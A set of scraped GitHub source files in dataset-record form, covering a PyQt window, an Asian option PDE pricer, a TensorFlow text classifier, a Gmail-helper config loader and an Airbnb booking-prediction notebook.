self.label_4.setText(_translate(\"MainWindow\", \"Удалить Cayman из автоскачивания\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Cayman\"))\n self.pushButton_3.setText(_translate(\"MainWindow\", \"Удалить\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \"Автоматическое скачивание\"))\n","repo_name":"zhukovva/cayman","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":18015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15451336800","text":"from typing import Callable, Tuple, Dict, Set\n\nimport numpy as np\nimport scipy.integrate as integrate\n\nfrom fypy.pricing.pde.utility.TridiagonalMatrix import TridiagonalMatrix\nfrom fypy.pricing.pde.utility.TridiagonalSolver import solve_dirichlet\n\n\nclass AsianOption:\n def __init__(self,\n strike: float,\n is_call: bool,\n observation_times: Dict[str, np.array],\n future_expiries: Dict[str, float],\n weights: Dict[str, float]):\n\n self._strike = strike\n self._is_call = is_call\n\n # Maps from the underlying tag to data. Validate keys.\n all_keys = set(observation_times.keys()).union(future_expiries.keys()).union(weights.keys())\n if len(all_keys) == 0:\n raise ValueError(f\"there must be at least one underlying\")\n self._num_underlyings = len(all_keys)\n self._all_underlyings = all_keys\n if len(observation_times) != len(all_keys) or len(future_expiries) != len(all_keys) or len(weights) != len(\n all_keys):\n raise ValueError(f\"observation_times, future_expiries, and weights must have the same underlying keys\")\n\n self._observation_times = observation_times\n self._future_expiries = future_expiries\n self._weights = weights\n\n @property\n def strike(self) -> float:\n return self._strike\n\n @property\n def is_call(self) -> bool:\n return self._is_call\n\n @property\n def observation_times(self) -> Dict[str, np.array]:\n return self._observation_times\n\n @property\n def weights(self) -> Dict[str, float]:\n return self._weights\n\n @property\n def future_expiries(self) -> Dict[str, float]:\n return self._future_expiries\n\n @property\n def all_underlyings(self) -> Set[str]:\n return self._all_underlyings\n\n def flatten_times(self):\n underlyings_at_times = {}\n\n for undl, times in self._observation_times:\n for t in times:\n underlyings_at_times.setdefault(t, set({})).add(undl)\n return underlyings_at_times\n\n\nclass AsianPDEPricer:\n def __init__(self,\n instrument: AsianOption,\n q: Callable[[float], float],\n mu: Callable[[float], float],\n sigma: Callable[[float, float], float],\n Ny: int):\n \"\"\"\n \"\"\"\n\n self._instrument = instrument\n\n self._q = q\n self._mu = mu\n self._sigma = sigma\n\n self._Ny = Ny\n\n # Map from times t to \\lambda_t. 
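Each lambda_t aggregates w_j * exp(integral of mu from the observation time to expiry) over all observations whose future expires at t; see _create_lambdas below.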
Make sure t = 0 is included.\n self._lambda = {}\n\n # \\Lambda_t = \\sum_{t_i} 1_{t_i < t} \\lambda_{t_i}\n self._Lambda = {}\n\n self._create_lambdas()\n\n self._current_Lambda = self._lambda_grid[-1]\n\n self._grid_y = None\n\n # TODO: Set.\n self._y0 = -2.0\n\n self._A = TridiagonalMatrix.create_matrix(self._Ny)\n self._B_a = np.zeros(shape=self._Ny - 1)\n self._B_b = np.zeros(shape=self._Ny)\n self._B_c = np.zeros(shape=self._Ny - 1)\n\n def _create_lambdas(self):\n \"\"\"\n From the observation times and weights, and the drift, mu, we can derive the lambda constants, and the\n cumulative Lambda constants.\n\n \\\\lambda_{j,k} = \\\\theta_j * \\\\exp [ \\\\int_{t_{j,k}}^{T_j} \\\\mu(s) ds ]\n\n where t_{j,k} is the k-th monitoring type of the j-th maturity, T_j is the final expiry of the j-th maturity.\n \"\"\"\n\n self._lambda = {}\n for undl in self._instrument.all_underlyings:\n T = self._instrument.future_expiries[undl]\n w = self._instrument.weights[undl]\n for t in self._instrument.observation_times[undl]:\n # Integrate\n value, err = integrate.quad(self._mu, t, T)\n lm = w * np.exp(value)\n self._lambda.setdefault(T, []).append(lm)\n\n for t, lambdas in sorted(self._lambda.items()):\n self._lambda[t] = np.sum(lambdas)\n\n # Create cumulative lambda => Lambda.\n running_sum = 0.\n lambda_array = []\n for t_i, lambda_i in sorted(self._lambda.items()):\n if t_i < 0:\n continue\n running_sum += lambda_i\n lambda_array.append(lambda_i)\n self._Lambda[t_i] = running_sum\n\n self._lambda_grid = np.array(lambda_array)\n\n def price(self):\n observation_time_grid = self._create_observation_time_grid()\n\n # Initialize y-grid.\n self._grid_y = self._create_y_grid()\n\n # Initialize payout.\n yvals = np.zeros(shape=self._Ny)\n self._initialize_payout(yvals)\n\n # Evolve PDE.\n for i in range(len(observation_time_grid) - 1):\n # Note that T0 < T1\n T0 = observation_time_grid[i]\n T1 = observation_time_grid[i + 1]\n\n # Set the current Lambda\n self._current_Lambda = self._Lambda[T1]\n\n # Create \"minor\" time grid, for evolution between t0 and t1.\n time_grid = self._create_time_grid(T0, T1)\n for it in range(len(time_grid) - 1):\n t0 = time_grid[it]\n t1 = time_grid[it + 1]\n dt = t0 - t1\n\n # Set up the A, B matrices.\n self._create_matrices(t0, dt)\n\n # Update the solution.\n yvals = self._solve_timestep(yvals=yvals)\n\n # Create next y-grid, interpolate values to initialize the next solution on that grid.\n pass\n\n def _w(self, t: float, y: float) -> float:\n return -self._mu(t) * (y + self._current_Lambda)\n\n def _v(self, t: float, y: float) -> float:\n return -self._sigma(t, -self._instrument.strike / y) * np.square(y + self._current_Lambda)\n\n def _create_y_grid(self) -> np.array:\n return np.linspace(self._y0, self._current_Lambda, self._Ny)\n\n def _initialize_payout(self, yvals: np.array):\n # NOTE: This probably won't work.\n # for i in range(self._Ny):\n # # Call payout.\n # yvals[i] = np.maximum(self._grid_y[i] - self._instrument.strike, 0)\n yvals = np.zeros(shape=self._Ny)\n\n def _create_matrices(self, t: float, dt: float):\n dy = self._grid_y[1] - self._grid_y[0] # Uniform grid.\n inv_dy = 1. / dy\n inv_dy_sqr = np.square(inv_dy)\n inv_dt = 1. 
/ dt\n\n for i, y in enumerate(self._grid_y[1:-1]): # for j = 1, ..., Ny - 2\n # Crank-Nicolson split: A is the implicit-side operator and B the explicit side;\n # they carry off-diagonal bands of opposite sign and their diagonals differ by 2/dt.\n self._A.lower[i + 1] = 0.25 * self._w(t, y) * inv_dy - 0.5 * self._v(t, y) * inv_dy_sqr\n self._A.diag[i + 1] = 0.5 * self._q(t) + inv_dt + 0.5 * self._v(t, y) * inv_dy_sqr\n self._A.upper[i + 1] = -0.25 * self._w(t, y) * inv_dy - 0.5 * self._v(t, y) * inv_dy_sqr\n\n self._B_a[i + 1] = -self._A.lower[i + 1]\n self._B_b[i + 1] = -self._A.diag[i + 1] + 2. * inv_dt\n self._B_c[i + 1] = -self._A.upper[i + 1]\n\n def _create_observation_time_grid(self) -> np.array:\n \"\"\"\n Create a grid of the observation times, ordered from final time to initial time (reverse time ordered).\n \"\"\"\n times = [0.]\n for t, _ in sorted(self._lambda.items(), reverse=True):\n if 0 < t:\n times.append(t)\n return np.array(times)\n\n def _create_time_grid(self, t0: float, t1: float) -> np.array:\n \"\"\"\n Create a time grid for evolving the system between t0 and t1. Note that t1 < t0, since this is a backwards\n equation.\n \"\"\"\n\n # TODO: Do this in a smart way.\n dt = 1. / 365.\n return np.arange(t0, t1, dt)\n\n def _solve_timestep(self, yvals) -> np.array:\n Ay = self._A * yvals\n\n u_left, u_right = 0., 0.\n return solve_dirichlet(self._B_a, self._B_b, self._B_c, Ay, u_left=u_left, u_right=u_right)\n","repo_name":"jkirkby3/fypy","sub_path":"fypy/pricing/pde/AsianPDEPricer.py","file_name":"AsianPDEPricer.py","file_ext":"py","file_size_in_byte":7858,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"}
+{"seq_id":"71856035320","text":"# -*-coding:utf-8 -*-\nimport tensorflow.compat.v1 as tf\nfrom dataset.text_dataset import WordDataset as dataset\nfrom model.train_helper import Trainer, build_model_fn, BaseEncoder\nfrom tools.opt_utils import train_op_clip_decay\nfrom tools.train_utils import add_layer_summary, HpParser\n\nhp_list = [HpParser.hp('embedding_dropout', 0.3),\n HpParser.hp('keep_oov', 0),\n HpParser.hp('lower_clip', -5),\n HpParser.hp('upper_clip', 5),\n HpParser.hp('decay_rate', 0.95),\n HpParser.hp('cell_type', 'lstm'),\n HpParser.hp('cell_size', 1), # number of stacked RNN layers\n HpParser.hp('cell_hidden_list', '128', lambda x: [int(i) for i in x.split(',')]),\n HpParser.hp('keep_prob_list', '0.8', lambda x: [float(i) for i in x.split(',')]),\n HpParser.hp('rnn_activation', 'tanh')\n ]\nhp_parser = HpParser(hp_list)\n\n\ndef build_rnn_cell(cell_type, activation, hidden_units_list, keep_prob_list, cell_size):\n if cell_type.lower() == 'rnn':\n cell_class = tf.nn.rnn_cell.BasicRNNCell # BasicRNNCell is instantiable; the abstract RNNCell base class is not\n elif cell_type.lower() == 'gru':\n cell_class = tf.nn.rnn_cell.GRUCell\n elif cell_type.lower() == 'lstm':\n cell_class = tf.nn.rnn_cell.LSTMCell\n else:\n raise Exception('Only rnn, gru, lstm are supported as cell_type')\n\n return tf.nn.rnn_cell.MultiRNNCell(\n cells=[tf.nn.rnn_cell.DropoutWrapper(cell=cell_class(num_units=hidden_units_list[i], activation=activation),\n output_keep_prob=keep_prob_list[i],\n state_keep_prob=keep_prob_list[i]) for i in range(cell_size)])\n\n\ndef bilstm(embedding, cell_type, activation, hidden_units_list, keep_prob_list, cell_size, seq_len, is_training):\n with tf.variable_scope('bilstm_layer'):\n if not is_training:\n keep_prob_list = len(keep_prob_list) * [1.0]\n fw = build_rnn_cell(cell_type, activation, hidden_units_list, keep_prob_list, cell_size)\n bw = build_rnn_cell(cell_type, activation, hidden_units_list, keep_prob_list, cell_size)\n\n # tuple of 2 : batch_size * max_seq_len * hidden_size\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(fw, bw, embedding, seq_len, 
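            # For example, with cell_hidden_list=[128] each direction produces a
            # [batch_size, max_seq_len, 128] tensor here, and the axis -1 concat
            # below yields [batch_size, max_seq_len, 256].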
dtype=tf.float32)\n\n # concat forward and backward along embedding axis\n outputs = tf.concat(outputs, axis=-1) # batch_size * max_seq_len * (hidden_size * 2)\n add_layer_summary('bilstm_concat', outputs)\n return outputs\n\n\nclass TextrcnnEncoder(BaseEncoder):\n def __init__(self):\n super(TextrcnnEncoder, self).__init__()\n self.embedding = None\n\n def encode(self, features, is_training):\n with tf.variable_scope('embedding', reuse=tf.AUTO_REUSE):\n self.embedding = tf.get_variable(shape=[self.params['vocab_size'], self.params['embedding_size']],\n dtype=tf.float32, name='pretrain_embedding')\n input_emb = tf.nn.embedding_lookup(self.embedding, features['input_ids'], name='input_emb')\n input_emb = tf.layers.dropout(input_emb, rate=self.params['embedding_dropout'], seed=1234, training=is_training)\n add_layer_summary('input_emb', input_emb)\n\n with tf.variable_scope('textrcnn', reuse=tf.AUTO_REUSE):\n lstm_output = bilstm(input_emb, self.params['cell_type'], self.params['rnn_activation'],\n self.params['cell_hidden_list'], self.params['keep_prob_list'],\n self.params['cell_size'], features['seq_len'], is_training) # batch, max_seq_len, emb*2\n\n output_emb = tf.reduce_max(lstm_output, axis=1, keep_dims=False)\n\n return output_emb\n\n def __call__(self, features, labels, params, is_training):\n self.params = params\n embedding = self.encode(features, is_training)\n with tf.variable_scope('mlp'):\n preds = tf.layers.dense(embedding, units=self.params['label_size'], activation=None, use_bias=True)\n add_layer_summary('preds', preds)\n return preds, labels\n\n def init_fn(self):\n \"\"\"\n # load embedding in params using scaffold\n \"\"\"\n def init_fn(scaffold, sess):\n sess.run(self.embedding.initializer, {self.embedding.initial_value: self.params['embedding']})\n\n scaffold = tf.train.Scaffold(init_fn=init_fn)\n return scaffold\n\n def optimize(self, loss):\n \"\"\"\n Use Adam Optimizer with gradient clip and exponential decay\n \"\"\"\n train_op = train_op_clip_decay(loss, self.params['lr'],\n self.params['num_train_steps'], self.params['decay_rate'],\n self.params['lower_clip'], self.params['upper_clip']\n )\n return train_op\n\n\ntrainer = Trainer(model_fn=build_model_fn(TextrcnnEncoder()),\n dataset_cls=dataset)\n\n\n","repo_name":"DSXiangLi/SimpleClassification","sub_path":"model/textrcnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"32832136961","text":"import os\nimport sys\nimport yaml\n\n\ndef config_yaml():\n \"\"\"Returns config yaml path.\n First priority given to passed 0th argument.\n Second priority given to env var 'GMAIL_HELPER_CONFIG' value.\n\n Args: None\n \"\"\"\n try:\n if os.path.exists(sys.argv[1]):\n return sys.argv[1]\n else:\n return \"config.yaml\"\n except Exception as e:\n print(e)\n try:\n return os.environ(\"GMAIL_HELPER_CONFIG\")\n except:\n return \"config.yaml\"\n\n\nCONFIG = {}\ntry:\n with open(config_yaml(), \"r\") as ymlfile:\n CONFIG = yaml.safe_load(ymlfile)\nexcept Exception as e:\n print(e)\n print(\"error reading config file: '%s'; would try env var as default else make error exit\" % (config_yaml()))\n\n\ndef env_else_yaml(config_name):\n \"\"\"Returns config value of provided name.\n First priority given to env var value for it.\n Second priority given to config yaml value for it.\n Else it prints error and exits.\n\n Args: None\n \"\"\"\n try:\n envvar_name = \"GMAIL_HELPER_%s\" % (config_name)\n 
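        # Illustrative usage (hypothetical values): if config.yaml sets
        #   log_debug: false
        # then running with GMAIL_HELPER_log_debug=true in the environment makes
        # env_else_yaml("log_debug") return "true" -- the env var takes priority.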
return os.environ[envvar_name]\n except:\n try:\n return CONFIG[config_name]\n except:\n print(\"failed to get config: %s\" % (config_name))\n sys.exit(1)\n\n\ndef gmail_credential_jsonpath():\n return env_else_yaml(\"gmail_credential_jsonpath\")\n\ndef gmail_auth_picklepath():\n return env_else_yaml(\"gmail_auth_picklepath\")\n\ndef log_debug():\n return env_else_yaml(\"log_debug\")\n\n\ndef get_dir_config(config_key):\n fs_path = env_else_yaml(config_key)\n if not os.path.isdir(fs_path):\n try:\n os.makedirs(fs_path)\n except:\n print(\"failed creating configured %s: %s\" % (config_key, fs_path))\n return fs_path\n\ndef data_basepath():\n return get_dir_config(\"data_basepath\")\n\ndef filters_json_basepath():\n return get_dir_config(\"filters_json_basepath\")\n\ndef scopes():\n ret_val = env_else_yaml(\"scopes\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n\ndef since_year():\n return int(env_else_yaml(\"since_year\"))\n\ndef before_year():\n return int(env_else_yaml(\"before_year\"))\n\ndef filters_to_delete():\n ret_val = env_else_yaml(\"filters_to_delete\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n\ndef message_ids_to_skip():\n ret_val = env_else_yaml(\"message_ids_to_skip\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n\ndef labels_to_skip():\n ret_val = env_else_yaml(\"labels_to_skip\")\n if isinstance(ret_val, list):\n return ret_val\n else:\n return ret_val.split(\",\")\n","repo_name":"abhishekkr/gmail-helper","sub_path":"_config_/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"40"}
+{"seq_id":"4628431060","text":"\n# coding: utf-8\n\n# Machine Learning Final Project\n# `Airbnb` Bookings\n# ===\n\n# # Abstract\n\n# New users on Airbnb can book a place to stay in 34,000+ cities across 190+ countries. By accurately predicting where a new user will book their first travel experience, Airbnb can share more personalized content with their community, decrease the average time to first booking, and better forecast demand.\n\n# ## Key Questions\n\n# - Predict which country a new user’s first booking destination will be. (Supervised)\n# - Constraints on users?\n# - Target Marketing.\n# - Predict the time between creating the account and booking (Outlier)\n\n# # Introduction\n\n# ## Why this project?\n\n# Why is this project interesting and relevant? It maps directly onto a real product decision: better first-destination predictions let Airbnb personalize content for new users and shorten the time to a first booking.\n\n# ## Data Set \n\n# - train_users.csv - the training set of users \n# - test_users.csv - the test set of users\n# - sessions.csv - web sessions log for users\n# - countries.csv - summary statistics of destination countries in this dataset and their locations \n# - age_gender_bkts.csv - summary statistics of users' age group, gender, country of destination \n# - sample_submission.csv - correct format for submitting your predictions\n\n# We have a list of users along with their demographics, web session records, and some summary statistics, a total of 16 variables. The majority of the variables are categorical. There are 213,466 users in the training set and 62,096 in the test set. \n\n# The training and test sets are split by dates. 
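# (Sketch, assuming the standard Kaggle file layout listed above; the cutoff mirrors
# the 7/1/2014 date mentioned next:)
#
#     users = pd.read_csv('./data/train_users.csv', parse_dates=['date_account_created'])
#     test_like = users[users['date_account_created'] >= '2014-07-01']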
In the test set, you will predict all the new users with first activities after 7/1/2014 (note: this is updated on 12/5/15 when the competition restarted).\n\n# ## Setups \n\n# In[11]:\n\nimport os\nimport random\nfrom collections import Counter\n\nimport numpy as np\nimport pandas as pd\n\n# Plotting\nget_ipython().magic('matplotlib inline')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Machine Learning\nfrom sklearn.feature_selection import SelectPercentile\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n# import category_encoders as ce\n\n\n# In[12]:\n\nsns.set_context(\"paper\")\n\n\n# # Data Preparation\n\n# ## Work Flow\n\n# 0. Preprocessing \n# - Formatting\n# - Cleaning \n# 0. Transformation\n# - Scaling\n# - Decomposition (date, time)\n# 0. Feature Selection\n\n# some question I may be insterested in asking:\n# (2, 3 questions are more interesting to answer) \n# \n# 1. predict the first destination of a new user. \n# 2. predict the time between creating the account and booking \n# 3. look into what signup method I want to invest more money in? (What signup method is the most popular or has the highest rate of booking a hotel) \n\n# ## Helper Functions\n\n# In[185]:\n\ndef get_summary(df, all=True):\n get_shape(df)\n print('\\nData Types')\n get_dtypes(df)\n print('\\nNA Values')\n get_NAs(df, all=all)\n\n\n# In[186]:\n\ndef get_shape(df):\n num_obs, num_features = df.shape\n print('There are {} observations with {} features'\n .format(num_obs, num_features))\n\n\n# In[15]:\n\ndef get_dtypes(df):\n _, num_features = df.shape\n dtype_counts = Counter(df.dtypes).most_common()\n print(df.dtypes, '\\n')\n for dtype, counts in dtype_counts:\n print('{}: {} {:.2f}%'\n .format(dtype, counts, counts / num_features * 100))\n\n\n# In[16]:\n\ndef get_NAs(df, all=True):\n num_obs, _ = df.shape\n for feature, num_na in df.isnull().sum().items():\n if all:\n print(\"{}: {} {:.2f}%\"\n .format(feature, num_na, num_na / num_obs * 100))\n if num_na > 0:\n print(\"{}: {} {:.2f}%\"\n .format(feature, num_na, num_na / num_obs * 100))\n\n\n# In[17]:\n\ndef get_categorical(df):\n return [feature for feature, dtype in df.dtypes.items()\n if dtype == 'O']\n\n\n# In[18]:\n\ndef get_numerical(df):\n return [feature for feature, dtype in df.dtypes.items()\n if feature not in get_categorical(df)]\n\n\n# ## Data Cleaning\n\n# Load the data into DataFrames\n\n# In[19]:\n\nget_ipython().magic('ls data')\n\n\n# In[20]:\n\nfiles = [f for f in os.listdir('./data/') if f.endswith('csv')]\nfiles\n\n\n# In[21]:\n\nna_values = ['-unknown-', ' ']\n\n\n# ## Users\n\n# In[22]:\n\nusers_train_file, users_test_file = files[4], files[3]\n\n\n# In[23]:\n\nusers = pd.read_csv('./data/{}'.format(users_train_file),\n na_values=na_values)\n\n\n# In[24]:\n\nusers.sample(10)\n\n\n# In[25]:\n\nget_summary(users)\n\n\n# > 58.35% of the users have never booked. Let's explore why.\n\n# In[26]:\n\nget_numerical(users)\n\n\n# In[27]:\n\nget_categorical(users)\n\n\n# Some of these are not categorical, let's fix that.\n\n# ### Cleaning DateTime\n\n# 0. change data types to datetime\n# 0. created, first booking - extract month\n# 0. time difference in days between created and first booking\n# 0. 
first active - extract hour of the day\n\n# In[28]:\n\nusers_cols_date = [feature for feature in users.keys()\n if 'date' in feature]\nusers_cols_time = [feature for feature in users.keys()\n if 'time' in feature]\nusers_cols_dt = users_cols_date + users_cols_time\n\n\n# We also record the columns after change\n\n# In[29]:\n\nusers_cols_dt_after = list(users_cols_dt)\n\n\n# In[30]:\n\nusers[users_cols_dt].sample(5)\n\n\n# #### change data types to datetime\n\n# In[31]:\n\nusers[users_cols_date].sample(5)\n\n\n# In[32]:\n\nusers[users_cols_date].dtypes\n\n\n# In[33]:\n\nfor col in users_cols_date:\n users[col] = pd.to_datetime(users[col])\n\n\n# In[34]:\n\nusers[users_cols_date].dtypes\n\n\n# In[35]:\n\nusers[users_cols_time].head(5)\n\n\n# In[36]:\n\nusers[users_cols_time].dtypes\n\n\n# In[37]:\n\nfor col in users_cols_time:\n users[col] = pd.to_datetime(users[col], format=\"%Y%m%d%H%M%S\")\n\n\n# In[38]:\n\nusers[users_cols_time].dtypes\n\n\n# #### created, first booking - extract month\n\n# In[39]:\n\nusers[users_cols_dt].sample(5)\n\n\n# In[40]:\n\nfor col in users_cols_dt:\n users['{}_month'.format(col)] = users[col].apply(lambda dt: dt.month)\n users_cols_dt_after += ['{}_month'.format(col)]\n\n\n# In[41]:\n\nusers_cols_dt_month = [col + '_month' for col in users_cols_dt]\n\n\n# In[42]:\n\nusers[users_cols_dt_month].sample(5)\n\n\n# #### time difference in days between created and first booking\n\n# In[43]:\n\nusers_cols_date\n\n\n# In[44]:\n\nusers['time_delta_bc'] = users[users_cols_date[1]] - users[users_cols_date[0]]\nusers['time_delta_bc'] = (\n users['time_delta_bc'].dropna() / np.timedelta64(1, 'D')).astype(int)\nusers_cols_dt_after += ['time_delta_bc']\n\n\n# In[45]:\n\nusers[['time_delta_bc']].sample(5)\n\n\n# #### first active hour of the day\n\n# In[46]:\n\nusers[users_cols_time].sample(5)\n\n\n# In[47]:\n\nfor col in users_cols_time:\n users['{}_hour'.format(col)] = users[col].apply(lambda dt: dt.hour)\n users_cols_dt_after += ['{}_hour'.format(col)]\n\n\n# In[48]:\n\nusers_cols_time_hour = [col + '_hour' for col in users_cols_time]\n\n\n# In[49]:\n\nusers[users_cols_time_hour].sample(5)\n\n\n# ### Cleaning `age`\n\n# In[50]:\n\nusers['age'].describe()\n\n\n# In[51]:\n\nsns.distplot(users['age'].dropna())\n\n\n# In[52]:\n\nusers.shape\n\n\n# In[53]:\n\nusers = users[users['age'].fillna(0) < 100]\n\n\n# In[54]:\n\nusers.shape\n\n\n# In[55]:\n\nusers[['age']].sample(10)\n\n\n# In[56]:\n\nsns.distplot(users['age'].dropna())\n\n\n# ### Convert Categorical Data\n\n# In[57]:\n\nusers.drop(users_cols_dt_after, axis=1).sample(5)\n\n\n# In[58]:\n\nusers_cols_categorical = get_categorical(users)\nusers_cols_categorical\n\n\n# We don't need id since that's just randomly generated index\n\n# In[59]:\n\nusers_cols_categorical.remove('id')\nusers_cols_categorical\n\n\n# Some of the datetime (hour and month) can also be categorical (ordinal)\n\n# In[60]:\n\nusers_cols_dt_categorical = [col for col in users_cols_dt_after\n if 'month' in col or 'hour' in col]\nusers_cols_dt_categorical\n\n\n# In[61]:\n\nusers_cols_categorical += users_cols_dt_categorical\n\n\n# In[62]:\n\nusers_cols_categorical\n\n\n# In[63]:\n\nfor col in users_cols_categorical:\n users[col] = users[col].astype('category')\n\n\n# In[64]:\n\nget_dtypes(users)\n\n\n# ### Fill NAs\n\n# In[65]:\n\nget_NAs(users, all=False)\n\n\n# We will try out different methods for dealing with NAs\n\n# #### drop all NAs\n\n# Conditions:\n# 1. Have sufficient data points, so the model doesn't lose power.\n# 2. 
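# (A quick representativeness check for these conditions, sketched with the
# gender column compared before and after dropping rows:
#
#     before = users['gender'].value_counts(normalize=True)
#     after = users.dropna()['gender'].value_counts(normalize=True)
#     (before - after).abs()  # large gaps would signal a skewed class mix
# )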
Not to introduce bias (meaning, disproportionate or non-representation of classes).\n\n# In[66]:\n\nusers_dropna = users.dropna().reset_index(drop=True)\n\n\n# In[67]:\n\nget_summary(users_dropna, all=False)\n\n\n# In[68]:\n\nusers['gender'].value_counts().plot(kind='bar')\n\n\n# In[69]:\n\nusers_dropna['gender'].value_counts().plot(kind='bar')\n\n\n# In[70]:\n\nsns.distplot(users['age'].dropna())\n\n\n# In[71]:\n\nsns.distplot(users_dropna['age'])\n\n\n# # Machine Learning\n\n# ## Helper Functions\n\n# In[187]:\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_selection import RFE\n\n\n# In[188]:\n\ndef encode_features(features, cols):\n \"\"\"Encode all nominal features to oridinal\"\"\"\n features_encoded = features.copy(deep=True)\n feature_encoding_map = {col: LabelEncoder() for col in cols}\n\n for col in cols:\n features_encoded[col] = feature_encoding_map[col].fit_transform(\n features_encoded[col])\n\n return features_encoded, feature_encoding_map\n\n\n# In[189]:\n\ndef eval_on_data(features, target, model, seed=523):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=seed,\n test_size=.15)\n model.fit(X_train, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(model.score(X_train, y_train) * 100))\n print(\"Test Score with all features: {:.3f}%\"\n .format(model.score(X_test, y_test) * 100))\n\n\n# Select feature by best K features univariate regressions\n\n# In[190]:\n\ndef select_features(features, target, clf, selector=SelectKBest, verbose=False, max_k=None):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n num_features = X_train.shape[1]\n max_k = max_k if max_k else num_features\n K = [i for i in range(1, max_k + 1)]\n scores_train, scores_test = [], []\n for k in K:\n select = selector(k=k)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n print(\"k={}\".format(k))\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n scores_train += [score_train]\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n scores_test += [score_test]\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(k))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n plt.plot(K, scores_train, label='training score')\n plt.plot(K, scores_test, label='test score')\n plt.legend()\n return K, scores_train, scores_test\n\n\n# In[191]:\n\ndef select_features_perc(features, target, clf, max_perc=50, inc=5, verbose=False):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n\n percs = list(range(1, max_perc + 1, inc))\n scores_train, scores_test = [], []\n for perc in percs:\n select = SelectPercentile(percentile=perc)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = 
select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n print(\"k={}\".format(k))\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n scores_train += [score_train]\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n scores_test += [score_test]\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(perc))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n plt.plot(percs, scores_train, label='training score')\n plt.plot(percs, scores_test, label='test score')\n plt.legend()\n return percs, scores_train, scores_test\n\n\n# In[192]:\n\ndef select_features_model(features, target, clf, threshold='median', verbose=False):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n select = SelectFromModel(\n RandomForestClassifier(n_estimators=100, random_state=523),threshold=threshold)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(perc))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n return select\n\n\n# In[193]:\n\ndef select_features_RFE(features, target, clf, numX = 3,verbose=False):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n select = RFE(\n RandomForestClassifier(n_estimators=100, random_state=523),\n n_features_to_select=numX)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(perc))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n return select\n\n\n# In[79]:\n\ndef eval_selected_feature(features, target, clf, k):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n select = SelectKBest(k=k)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected 
